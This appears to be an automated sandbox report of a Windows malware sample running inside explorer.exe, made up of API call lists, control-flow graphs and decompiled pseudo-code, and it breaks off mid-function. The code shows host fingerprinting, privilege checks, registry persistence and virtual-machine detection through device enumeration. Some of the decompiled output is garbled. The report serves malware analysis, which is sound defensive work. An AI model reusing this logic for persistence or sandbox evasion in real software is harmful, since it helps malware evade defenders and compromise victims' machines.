    0x007c2a6c
    0x007c2a7e
    0x007c2a90
    0x007c2aa2
    0x007c2ab4
    0x007c2ac6
    0x007c2ad8
    0x007c2aea
    0x007c2afc
    0x007c2b0e
    0x007c2b20
    0x007c2b32
    0x007c2b44
    0x007c2b56
    0x007c2b68
    0x007c2b7a
    0x007c2b8c
    0x007c2b9e
    0x007c2bb0
    0x007c2bc2
    0x007c2bd4
    0x007c2be6
    0x007c2bf8
    0x007c2c0a
    0x007c2c1c
    0x007c2c2e
    0x007c2c40
    0x007c2c52
    0x007c2c64
    0x007c2c76
    0x007c2c88
    0x007c2c9a
    0x007c2cac
    0x007c2cbe
    0x007c2cd0
    0x007c2ce2
    0x007c2cf4
    0x007c2d06
    0x007c2d18
    0x007c2d2a
    0x007c2d3c
    0x007c2d4e
    0x007c2d53
    0x007c2d5f
    0x007c2d6f
    0x007c2d81
    0x007c2d93
    0x007c2d98
    0x007c2da4
    0x007c2db4
    0x007c2dc6
    0x007c2dd8
    0x007c2dea
    0x007c2dfc
    0x007c2e0e
    0x007c2e20
    0x007c2e32
    0x007c2e44
    0x007c2e56
    0x007c2e68
    0x007c2e7a
    0x007c2e8c
    0x007c2e9e
    0x007c2eb0
    0x007c2ec2
    0x007c2ed4
    0x007c2ee6
    0x007c2ef8
    0x007c2f0a
    0x007c2f1c
    0x007c2f2e
    0x007c2f40
    0x007c2f52
    0x007c2f64
    0x007c2f76
    0x007c2f88
    0x007c2f9a
    0x007c2fac
    0x007c2fbe
    0x007c2fd0
    0x007c2fda
    0x007c2fe0
    0x007c2ff0
    0x007c2ff5
    0x007c2ffb
    0x007c3001
    0x007c3011
    0x007c3016
    0x007c3022
    0x007c3032
    0x007c3044
    0x007c3056
    0x007c3068
    0x007c307a
    0x007c308c
    0x007c309e
    0x007c30a3
    0x007c30af
    0x007c30bf
    0x007c30d1
    0x007c30e3
    0x007c30f5
    0x007c3107
    0x007c3119
    0x007c312b
    0x007c313d
    0x007c314f
    0x007c3161
    0x007c3173
    0x007c3185
    0x007c3197
    0x007c31a9
    0x007c31bb
    0x007c31cd
    0x007c31df
    0x007c31f1
    0x007c3203
    0x007c3215
    0x007c3227
    0x007c3239
    0x007c324b
    0x007c325d
    0x007c326f
    0x007c3281
    0x007c3293
    0x007c32a5
    0x007c32b7
    0x007c32c9
    0x007c32db
    0x007c32ed
    0x007c32ff
    0x007c3311
    0x007c3323
    0x007c3335
    0x007c3347
    0x007c3359
    0x007c336b
    0x007c337d
    0x007c3382
    0x007c338e
    0x007c339e
    0x007c33b0
    0x007c33c2
    0x007c33c7
    0x007c33d3
    0x007c33e3
    0x007c33f5
    0x007c3407
    0x007c340c
    0x007c3412
    0x007c3418
    0x007c3428
    0x007c343a
    0x007c344c
    0x007c3451
    0x007c345d
    0x007c346d
    0x007c347f
    0x007c3484
    0x007c348a
    0x007c3490
    0x007c34a0
    0x007c34b2
    0x007c34c4
    0x007c34c9
    0x007c34d5
    0x007c34e5
    0x007c34f2
    0x007c34f7
    0x007c3500
    0x007c3506
    0x007c350c
    0x007c3512
    0x007c3522
    0x007c3534
    0x007c3546
    0x007c3558
    0x007c356a
    0x007c357c
    0x007c358e
    0x007c35a0
    0x007c35b2
    0x007c35c4
    0x007c35d6
    0x007c35e8
    0x007c35fa
    0x007c360c
    0x007c361e
    0x007c3630
    0x007c3642
    0x007c3654
    0x007c3666
    0x007c3678
    0x007c367d
    0x007c3683
    0x007c3689
    0x007c3699
    0x007c36ab
    0x007c36bd
    0x007c36cf
    0x007c36e1
    0x007c36f3
    0x007c3705
    0x007c3717
    0x007c3729
    0x007c373b
    0x007c374d
    0x007c375f
    0x007c3771
    0x007c3783
    0x007c3795
    0x007c37a7
    0x007c37b9
    0x007c37cb
    0x007c37dd
    0x007c37ea
    0x007c37ef
    0x007c37ef
    0x007c3858

    APIs
    • LoadLibraryA.KERNEL32(007C1BF0), ref: 007C2D59
    • LoadLibraryA.KERNEL32(007C1BE8), ref: 007C2D9E
    • LoadLibraryA.KERNELBASE(Psapi), ref: 007C2FDA
    • LoadLibraryA.KERNELBASE(007C1C40), ref: 007C2FFB
    • LoadLibraryA.KERNEL32(007C1CAC), ref: 007C301C
    • LoadLibraryA.KERNEL32(007C1D08), ref: 007C30A9
    • LoadLibraryA.KERNEL32(007C1C20), ref: 007C3388
    • LoadLibraryA.KERNEL32(007C1BF8), ref: 007C33CD
    • LoadLibraryA.KERNELBASE(007C1C28), ref: 007C3412
    • LoadLibraryA.KERNEL32(007C1EEC), ref: 007C3457
    • LoadLibraryA.KERNELBASE(007C1C38), ref: 007C348A
    • LoadLibraryA.KERNEL32(007C1CA4), ref: 007C34CF
    • LoadLibraryA.KERNELBASE(007C1EDC), ref: 007C350C
    • LoadLibraryA.KERNELBASE(007C1EE4), ref: 007C3683
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 505 7c8d0c-7c8d4b call 7c458c call 7c2574 call 7c44f0 GetCurrentProcess call 7c42d4 call 7c44f0 516 7c8d5d-7c8d63 GetCurrentProcess call 7c42d4 505->516 517 7c8d4d-7c8d5b call 7c41cc 505->517 520 7c8d68-7c8d72 516->520 522 7c8d77-7c8e3c GetCurrentProcess call 7c453c call 7c79bc LocalAlloc call 7c4408 CreateMutexA LocalFree call 7c1b50 call 7c8bfc call 7c7984 call 7c89d4 call 7c7a44 RtlInitializeCriticalSection call 7c47ac call 7c7304 517->522 520->522 543 7c8e48-7c8e4c 522->543 544 7c8e3e-7c8e43 call 7c744c 522->544 545 7c8e54-7c8e5e call 7c471c 543->545 546 7c8e4e-7c8e52 543->546 544->543 548 7c8e63-7c8e67 545->548 546->545 546->548 550 7c8ed8-7c8ee3 548->550 551 7c8e69-7c8eb4 call 7c1308 call 7c12dc call 7c133c call 7c471c 548->551 553 7c8f00-7c8f04 550->553 554 7c8ee5-7c8ef0 550->554 580 7c8ec8-7c8ed3 call 7c4a1c 551->580 581 7c8eb6-7c8ec6 call 7c4a1c 551->581 557 7c8f23-7c8f84 call 7c744c call 7c8b98 call 7c8b6c call 7c4ba0 call 7c5468 * 2 call 7c3b80 call 7c1308 call 7c1440 553->557 558 7c8f06-7c8f0a 553->558 554->553 556 7c8ef2-7c8efb call 7c8cf8 554->556 556->553 605 7c8f9a-7c8fa7 call 7c8064 557->605 606 7c8f86-7c8f93 call 7c8064 557->606 558->557 562 7c8f0c-7c8f1e call 7c1308 call 7c8b6c 558->562 577 7c901f-7c9062 call 7c38dc call 7c38ec call 7c5640 call 7c1308 call 7c84a4 562->577 602 7c9067-7c9072 RtlExitUserThread 577->602 580->550 581->550 610 7c8fac-7c8fb3 605->610 609 7c8f98 606->609 609->610 611 7c8fd7-7c8fe2 610->611 612 7c8fb5-7c8fc1 610->612 613 7c8fe4-7c8ff1 611->613 614 7c9015-7c901a call 7c7474 611->614 612->611 615 7c8fc3-7c8fd5 Sleep 612->615 617 7c9006-7c9010 call 7c471c 613->617 618 7c8ff3-7c8ffa 613->618 614->577 615->611 615->615 617->614 618->617 620 7c8ffc-7c9000 GetCursorPos 618->620 620->617
    C-Code - Quality: 87%
    			E007C8D0C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
    				intOrPtr _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				void* _v28;
    				struct tagPOINT _v36;
    				struct _SECURITY_ATTRIBUTES _v52;
    				char _v309;
    				void* _t58;
    				intOrPtr _t59;
    				void* _t60;
    				void* _t61;
    				signed int _t62;
    				void* _t65;
    				signed char _t66;
    				CHAR* _t72;
    				void* _t74;
    				intOrPtr _t90;
    				signed int _t92;
    				intOrPtr _t128;
    				signed int _t133;
    				signed int _t139;
    				signed char _t164;
    				void* _t166;
    				void* _t171;
    				intOrPtr _t183;
    				void* _t188;
    				void* _t191;
    
    				_t191 = __eflags;
    				_t166 = __ecx;
    				 *0x7cb114 = E007C458C(0);
    				E007C2574(_t54 | 0xffffffff); // executed
    				 *0x7ca064 = E007C44F0(_t191);
    				_t58 = GetCurrentProcess(); // executed
    				_t59 = E007C42D4(_t58); // executed
    				 *0x7ca068 = _t59;
    				_t60 = E007C44F0(_t191);
    				_t192 = _t60 - 0x3c;
    				if(_t60 >= 0x3c) {
    					_t61 = GetCurrentProcess(); // executed
    					_t62 = E007C42D4(_t61); // executed
    					__eflags = _t62 - 3;
    					_t2 = _t62 == 3;
    					__eflags = _t2;
    					asm("sbb eax, eax");
    					 *0x7ca034 =  ~(_t62 & 0xffffff00 | _t2);
    				} else {
    					_t164 = E007C41CC();
    					asm("sbb eax, eax");
    					 *0x7ca034 =  ~_t164;
    				}
    				_t65 = GetCurrentProcess(); // executed
    				_t66 = E007C453C(_t65); // executed
    				asm("sbb eax, eax");
    				 *0x7ca058 =  ~_t66;
    				E007C79BC(_t192);
    				_v28 = LocalAlloc(0, 0x14);
    				E007C4408( &_v52, _v28);
    				_t72 =  *0x7ca0d8; // 0x7c1cc8
    				_t74 = CreateMutexA( &_v52, 0, _t72); // executed
    				 *0x7ca054 = _t74;
    				LocalFree(_v28);
    				_t77 = _a4;
    				asm("sbb eax, eax");
    				_v12 =  ~(_a4 & 0xffffff00 |  *_t77 == 0x0000002b);
    				_t80 = _a4;
    				asm("sbb eax, eax");
    				_v16 =  ~(_a4 & 0xffffff00 |  *((char*)(_t80 + 1)) == 0x0000002b);
    				_a4 = _a4 + 2;
    				E007C1B50(); // executed
    				E007C8BFC(); // executed
    				E007C7984(); // executed
    				E007C89D4(); // executed
    				E007C7A44(_t166); // executed
    				 *0x7cb408(0x7cbe04);
    				_t90 = E007C47AC(_a4, 0x7cb510); // executed
    				 *0x7cb514 = _t90;
    				_t92 = E007C7304(0x7cb61c); // executed
    				_v24 = _t92;
    				asm("sbb eax, eax");
    				if( ~( ~_v24) == 0) {
    					E007C744C(0x7cb61c); // executed
    				}
    				if(_v12 != 0 || _v16 != 0) {
    					E007C471C(_a4, 0x2ee0, 0);
    				}
    				if(_v12 != 0) {
    					E007C1308( &_v309, _a4);
    					 *((char*)(_t188 + E007C12DC( &_v309) - 0x135)) = 0;
    					E007C133C( &_v309, ".lnk");
    					E007C471C( &_v309, 0, 0);
    					if( *0x7ca034 == 0) {
    						E007C4A1C(0x80000001,  &_v309);
    					} else {
    						E007C4A1C(0x80000002,  &_v309);
    					}
    				}
    				asm("sbb eax, eax");
    				if( ~( ~_v12) == 0) {
    					asm("sbb eax, eax");
    					if( ~( ~_v16) == 0) {
    						_t183 =  *0x7cb514; // 0x28800
    						E007C8CF8(_a4, _t183);
    					}
    				}
    				if(_v12 == 0 || _v24 == 0) {
    					E007C744C(0x7cb61c); // executed
    					E007C8B98(0x7cb518); // executed
    					E007C8B6C(); // executed
    					E007C4BA0(0x7cb719); // executed
    					 *0x7cb780 = E007C5468();
    					 *0x7cb651 = E007C5468();
    					_v8 = E007C3B80(5, 0x19, 0xd);
    					E007C1308(0x7cb752, _v8);
    					E007C1440(_v8);
    					__eflags =  *0x7ca034;
    					if( *0x7ca034 == 0) {
    						__eflags = 0;
    						_t181 =  *0x7ca260; // 0x7c21a4
    						E007C8064(0x80000001, 0, _t181);
    					} else {
    						_t181 =  *0x7ca260; // 0x7c21a4
    						E007C8064(0x80000002, 0, _t181); // executed
    					}
    					__eflags =  *0x7cb621;
    					if( *0x7cb621 == 0) {
    						L24:
    						asm("sbb eax, eax");
    						__eflags =  ~( ~_v12);
    						if(__eflags == 0) {
    							_t133 =  *0x7cb784; // 0xd4
    							__eflags = _t133 &  *0x7ca070;
    							if((_t133 &  *0x7ca070) != 0) {
    								__eflags =  *0x7cb621 - 0x5a;
    								if( *0x7cb621 > 0x5a) {
    									GetCursorPos( &_v36);
    								}
    							}
    							_t181 = 0;
    							__eflags = 0;
    							E007C471C(_a4, 0x2ee0, 0); // executed
    						}
    						E007C7474(0x7cb61c, __eflags); // executed
    						goto L30;
    					} else {
    						_t139 =  *0x7cb621; // 0x12c
    						_v20 = _t139;
    						__eflags = _v20;
    						if(_v20 == 0) {
    							goto L24;
    						} else {
    							goto L23;
    						}
    						do {
    							L23:
    							Sleep(0x3e8); // executed
    							_v20 = _v20 - 1;
    							__eflags = _v20;
    						} while (_v20 != 0);
    						goto L24;
    					}
    				} else {
    					_t181 = _a4;
    					E007C1308(0x7cb518, _a4);
    					E007C8B6C();
    					L30:
    					E007C38DC(0x7cbe04);
    					 *0x7cc380 = 0;
    					E007C38EC(0x7cbe04);
    					_pop(_t171);
    					E007C5640(0x7cc384, _t171, _t181);
    					_t128 =  *0x7cb64d; // 0x0
    					 *0x7cc355 = _t128;
    					E007C1308(0x7cc254, 0x7cb625);
    					E007C84A4(); // executed
    					_push(0);
    					return RtlExitUserThread();
    				}
    			}

    APIs
      • Part of subcall function 007C44F0: GetVersionExA.KERNEL32(0000009C), ref: 007C451A
    • GetCurrentProcess.KERNEL32 ref: 007C8D33
      • Part of subcall function 007C42D4: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 007C42EC
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007C430E
      • Part of subcall function 007C42D4: GetLastError.KERNEL32 ref: 007C4322
      • Part of subcall function 007C42D4: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 007C4358
      • Part of subcall function 007C42D4: GetSidSubAuthorityCount.ADVAPI32(?), ref: 007C436E
      • Part of subcall function 007C42D4: GetSidSubAuthority.ADVAPI32(?,?), ref: 007C4393
      • Part of subcall function 007C42D4: CloseHandle.KERNEL32(?), ref: 007C43F3
    • GetCurrentProcess.KERNEL32 ref: 007C8D5D
    • GetCurrentProcess.KERNEL32 ref: 007C8D77
      • Part of subcall function 007C453C: GetCurrentProcess.KERNEL32 ref: 007C4555
      • Part of subcall function 007C453C: IsWow64Process.KERNELBASE(00000000,?), ref: 007C456F
      • Part of subcall function 007C79BC: RtlInitializeCriticalSection.NTDLL(007CBE04), ref: 007C7A14
      • Part of subcall function 007C79BC: RtlInitializeCriticalSection.NTDLL(007CC234), ref: 007C7A2E
    • LocalAlloc.KERNEL32(00000000,00000014), ref: 007C8D94
      • Part of subcall function 007C4408: InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 007C441F
      • Part of subcall function 007C4408: SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 007C4437
      • Part of subcall function 007C4408: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(007C1CB4,00000001,?,00000000), ref: 007C4453
      • Part of subcall function 007C4408: GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4478
      • Part of subcall function 007C4408: SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 007C4498
      • Part of subcall function 007C4408: LocalFree.KERNEL32(?), ref: 007C44AC
    • CreateMutexA.KERNELBASE(?,00000000,007C1CC8), ref: 007C8DB4
    • LocalFree.KERNEL32(?), ref: 007C8DC3
      • Part of subcall function 007C8BFC: RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C8C1B
      • Part of subcall function 007C7984: GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,007CB110,?,?,00000000,00000000), ref: 007C79A5
      • Part of subcall function 007C89D4: GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C89F4
      • Part of subcall function 007C7A44: GetModuleFileNameA.KERNEL32(00000000,?,00000401), ref: 007C7A67
      • Part of subcall function 007C7A44: GetFileVersionInfoSizeA.KERNELBASE(?,?), ref: 007C7A88
      • Part of subcall function 007C7A44: GetFileVersionInfoA.KERNELBASE(?,?,00000000,?), ref: 007C7AB9
    • RtlInitializeCriticalSection.NTDLL(007CBE04), ref: 007C8E0C
      • Part of subcall function 007C47AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C47D9
      • Part of subcall function 007C47AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C47FB
      • Part of subcall function 007C47AC: GetFileSize.KERNEL32(?,00000000), ref: 007C4810
      • Part of subcall function 007C47AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C483F
      • Part of subcall function 007C47AC: CloseHandle.KERNEL32(?), ref: 007C4849
      • Part of subcall function 007C7304: RegOpenKeyExA.KERNELBASE(80000002,007C21A4,00000000,000F003F,?), ref: 007C7331
      • Part of subcall function 007C7304: RegOpenKeyExA.ADVAPI32(80000001,007C21A4,00000000,000F003F,?), ref: 007C7352
      • Part of subcall function 007C471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 007C4777
      • Part of subcall function 007C471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 007C4786
      • Part of subcall function 007C471C: CloseHandle.KERNEL32(?), ref: 007C4790
      • Part of subcall function 007C4A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 007C4A55
      • Part of subcall function 007C8B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,000000FF), ref: 007C8BB2
      • Part of subcall function 007C8B98: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C8BD6
      • Part of subcall function 007C8B6C: CreateThread.KERNEL32(00000000,00000000,Function_00008AA4,00000000,00000000,?), ref: 007C8B81
      • Part of subcall function 007C8B6C: CloseHandle.KERNEL32(?), ref: 007C8B8E
      • Part of subcall function 007C4BA0: GetComputerNameA.KERNEL32(?,00000101), ref: 007C4BC3
      • Part of subcall function 007C4BA0: RegOpenKeyExA.KERNELBASE(80000002,007C2174,00000000,00020119,?), ref: 007C4C01
      • Part of subcall function 007C4BA0: GetVolumeInformationA.KERNELBASE(007C21D0,00000000,00000000,?,?,?,00000000,00000000), ref: 007C4D40
      • Part of subcall function 007C5468: GetSystemTime.KERNEL32(?), ref: 007C5472
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
      • Part of subcall function 007C8064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 007C808B
      • Part of subcall function 007C8064: RegDeleteValueA.ADVAPI32(?,?), ref: 007C809D
    • Sleep.KERNELBASE(000003E8), ref: 007C8FC8
    • GetCursorPos.USER32(?), ref: 007C9000
      • Part of subcall function 007C7474: RegCreateKeyExA.KERNELBASE(80000002,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C750D
      • Part of subcall function 007C7474: RegCreateKeyExA.ADVAPI32(80000001,007C21A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 007C7533
      • Part of subcall function 007C38DC: RtlEnterCriticalSection.NTDLL(?), ref: 007C38E3
      • Part of subcall function 007C38EC: RtlLeaveCriticalSection.NTDLL(?), ref: 007C38F3
      • Part of subcall function 007C5640: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C5664
      • Part of subcall function 007C5640: FindFirstFileA.KERNELBASE(?,00000080), ref: 007C5697
      • Part of subcall function 007C5640: FindNextFileA.KERNELBASE(000000FF,00000080), ref: 007C5825
      • Part of subcall function 007C5640: FindClose.KERNEL32(000000FF), ref: 007C583D
      • Part of subcall function 007C84A4: Sleep.KERNEL32(00004E20), ref: 007C8519
      • Part of subcall function 007C84A4: GetTickCount.KERNEL32 ref: 007C86EB
      • Part of subcall function 007C84A4: Sleep.KERNEL32(00003A98), ref: 007C8706
      • Part of subcall function 007C84A4: RtlExitUserThread.NTDLL(00000000), ref: 007C8879
      • Part of subcall function 007C84A4: RtlExitUserThread.NTDLL(00000000), ref: 007C88B6
      • Part of subcall function 007C84A4: Sleep.KERNEL32(000003E8), ref: 007C895F
    • RtlExitUserThread.NTDLL(00000000), ref: 007C9069
      • Part of subcall function 007C41CC: GetCurrentThread.KERNEL32 ref: 007C41DE
      • Part of subcall function 007C41CC: OpenThreadToken.ADVAPI32(00000000), ref: 007C41E5
      • Part of subcall function 007C41CC: GetLastError.KERNEL32 ref: 007C41F4
      • Part of subcall function 007C41CC: GetCurrentProcess.KERNEL32 ref: 007C4207
      • Part of subcall function 007C41CC: OpenProcessToken.ADVAPI32(00000000), ref: 007C420E
      • Part of subcall function 007C41CC: GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 007C4241
      • Part of subcall function 007C41CC: CloseHandle.KERNEL32(?), ref: 007C424E
      • Part of subcall function 007C41CC: AllocateAndInitializeSid.ADVAPI32(007CA2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C4278
      • Part of subcall function 007C41CC: EqualSid.ADVAPI32(?,?), ref: 007C42A2
      • Part of subcall function 007C41CC: FreeSid.ADVAPI32(?), ref: 007C42BE
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 66%
    			E007C6ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
    				intOrPtr _v4;
    				void* _v8;
    				void* _v12;
    				struct HINSTANCE__* _v16;
    				signed int _v20;
    				void* _v28;
    				CHAR* _v36;
    				void* _v157;
    				void* _v188;
    				char* __ebp;
    				void* _t115;
    
    				_t115 = __ecx;
    				_t57 = __eax;
    				if(__esi + 1 <= 0) {
    					L7:
    					__eflags =  *(_t115 - 0x45ffffff) & _t57;
    				} else {
    					if(__eflags <= 0) {
    						asm("lock lea eax, [ebp-0x209]");
    						if(E007C1110(__eax, _v16) != 0) {
    							_v4 = 0xffffffff;
    						}
    						E007C1440(_v16);
    						return _v4;
    					} else {
    						asm("rol esi, 1");
    						asm("sahf");
    						asm("out 0x48, al");
    						asm("salc");
    						asm("sbb [eax], eax");
    						__eax->i = __eax->i + __al;
    						__dh = __dh + __al;
    						asm("repne shl dl, 0x4a");
    						__ebp =  &_a1;
    						_push(es);
    						asm("rol byte [fs:eax], 0x0");
    						_push( &_a1);
    						__ebp = __esp;
    						__esp = __esp + 0xffffff44;
    						__eax = 0;
    						_v16 = 0;
    						__eax =  *0x7ca55c; // 0x7c6ed0
    						_v36 = __eax;
    						__eax = _v36;
    						__eax = LoadLibraryA(_v36); // executed
    						_v20 = __eax;
    						__eax = _v36;
    						__eax = E007C1440(_v36);
    						__eflags = _v20;
    						if (_v20 == 0) goto L13;
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • LoadLibraryA.KERNELBASE(?), ref: 007C6F0B
    • SetupDiGetClassDevsA.SETUPAPI(007CA014,00000000,00000000,00000002), ref: 007C6F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C6FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 007C6FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C6FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C6FF1
    • SetupDiGetClassDevsA.SETUPAPI(007CA024,00000000,00000000,00000002), ref: 007C7028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C7056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 007C707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C7096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C70A0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    C-Code - Quality: 100%
    			E007C6EEC(void* __ecx) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				CHAR* _v28;
    				void* _v32;
    				void* _v161;
    				void* _v192;
    				intOrPtr _t54;
    				struct HINSTANCE__* _t57;
    
    				_v8 = 0;
    				_t54 =  *0x7ca55c; // 0x7c6ed0
    				_v28 = E007C3F38(_t54);
    				_t57 = LoadLibraryA(_v28); // executed
    				_v12 = _t57;
    				E007C1440(_v28);
    				if (_v12 == 0) goto L7;
    			}

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 007C6F0B
      • Part of subcall function 007C1440: GetProcessHeap.KERNEL32(00000000,?), ref: 007C144D
      • Part of subcall function 007C1440: HeapFree.KERNEL32(00000000), ref: 007C1454
    • SetupDiGetClassDevsA.SETUPAPI(007CA014,00000000,00000000,00000002), ref: 007C6F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C6FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 007C6FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C6FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C6FF1
    • SetupDiGetClassDevsA.SETUPAPI(007CA024,00000000,00000000,00000002), ref: 007C7028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 007C7056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 007C707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 007C7096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 007C70A0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 691 7c84a4-7c84dc call 7c13dc 694 7c8521-7c868f call 7c64bc call 7c1308 call 7c133c * 2 call 7c1864 call 7c133c * 2 call 7c1864 call 7c133c * 2 call 7c1164 call 7c133c * 2 call 7c8258 call 7c133c * 4 call 7c1864 call 7c133c 691->694 695 7c84de-7c84f4 call 7c1308 691->695 741 7c8691-7c86a1 call 7c133c 694->741 742 7c86a4-7c86fb call 7c133c call 7c4154 call 7c133c * 2 GetTickCount 694->742 698 7c84f9-7c8506 call 7c5ae8 695->698 702 7c850b-7c8512 698->702 702->694 704 7c8514-7c851f Sleep 702->704 704->698 741->742 753 7c86fd-7c8706 Sleep 742->753 754 7c870c-7c8750 call 7c12dc call 7c5d20 742->754 753->754 759 7c8756-7c8798 call 7c1110 call 7c5468 call 7c7474 754->759 760 7c88c9-7c8913 call 7c1308 call 7c660c 754->760 775 7c879e-7c87bd call 7c1110 759->775 776 7c88bc-7c88c4 call 7c1440 759->776 768 7c8918-7c891a 760->768 769 7c893c-7c8952 768->769 770 7c891c-7c8937 call 7c1308 * 2 768->770 769->694 770->769 783 7c87bf-7c87c6 775->783 784 7c87c8-7c87d1 call 7c1110 775->784 782 7c8957-7c8970 Sleep 776->782 782->782 785 7c8972 782->785 787 7c87d9-7c87dd 783->787 790 7c87d6 784->790 785->694 788 7c87df-7c8843 call 7c1110 call 7c12b8 call 7c10e0 787->788 789 7c8847-7c884b 787->789 788->789 792 7c884d-7c885d call 7c82f8 789->792 793 7c888e-7c889a call 7c7f20 789->793 790->787 802 7c8881-7c8889 call 7c1440 792->802 803 7c885f-7c887f call 7c80c0 call 7c1440 * 2 RtlExitUserThread 792->803 793->776 801 7c889c-7c88b6 call 7c80c0 call 7c1440 * 2 RtlExitUserThread 793->801 801->776 802->694 803->793
    C-Code - Quality: 98%
    			E007C84A4() {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr* _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				long _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				char _v156;
    				char _v4253;
    				char _v4382;
    				char _v4424;
    				char _v4428;
    				intOrPtr _t119;
    				intOrPtr _t121;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				intOrPtr _t140;
    				intOrPtr _t144;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t157;
    				intOrPtr _t165;
    				intOrPtr _t170;
    				intOrPtr _t174;
    				intOrPtr _t179;
    				intOrPtr _t187;
    				void* _t195;
    				intOrPtr _t198;
    				signed int _t199;
    				char _t202;
    				intOrPtr _t205;
    				signed int _t208;
    				char _t210;
    				intOrPtr _t220;
    				intOrPtr _t228;
    				char _t236;
    				intOrPtr _t269;
    				char _t276;
    				intOrPtr _t279;
    				intOrPtr _t280;
    				intOrPtr _t283;
    				intOrPtr _t289;
    				intOrPtr* _t290;
    				intOrPtr _t291;
    				intOrPtr _t292;
    				void* _t300;
    				void* _t301;
    				void* _t317;
    
    				_v68 = _t119;
    				_t121 = E007C13DC(0x20000); // executed
    				_v40 = _t121;
    				_v60 = 0;
    				_v64 = 0;
    				_v4382 = 0;
    				if( *0x7cb77c == 0) {
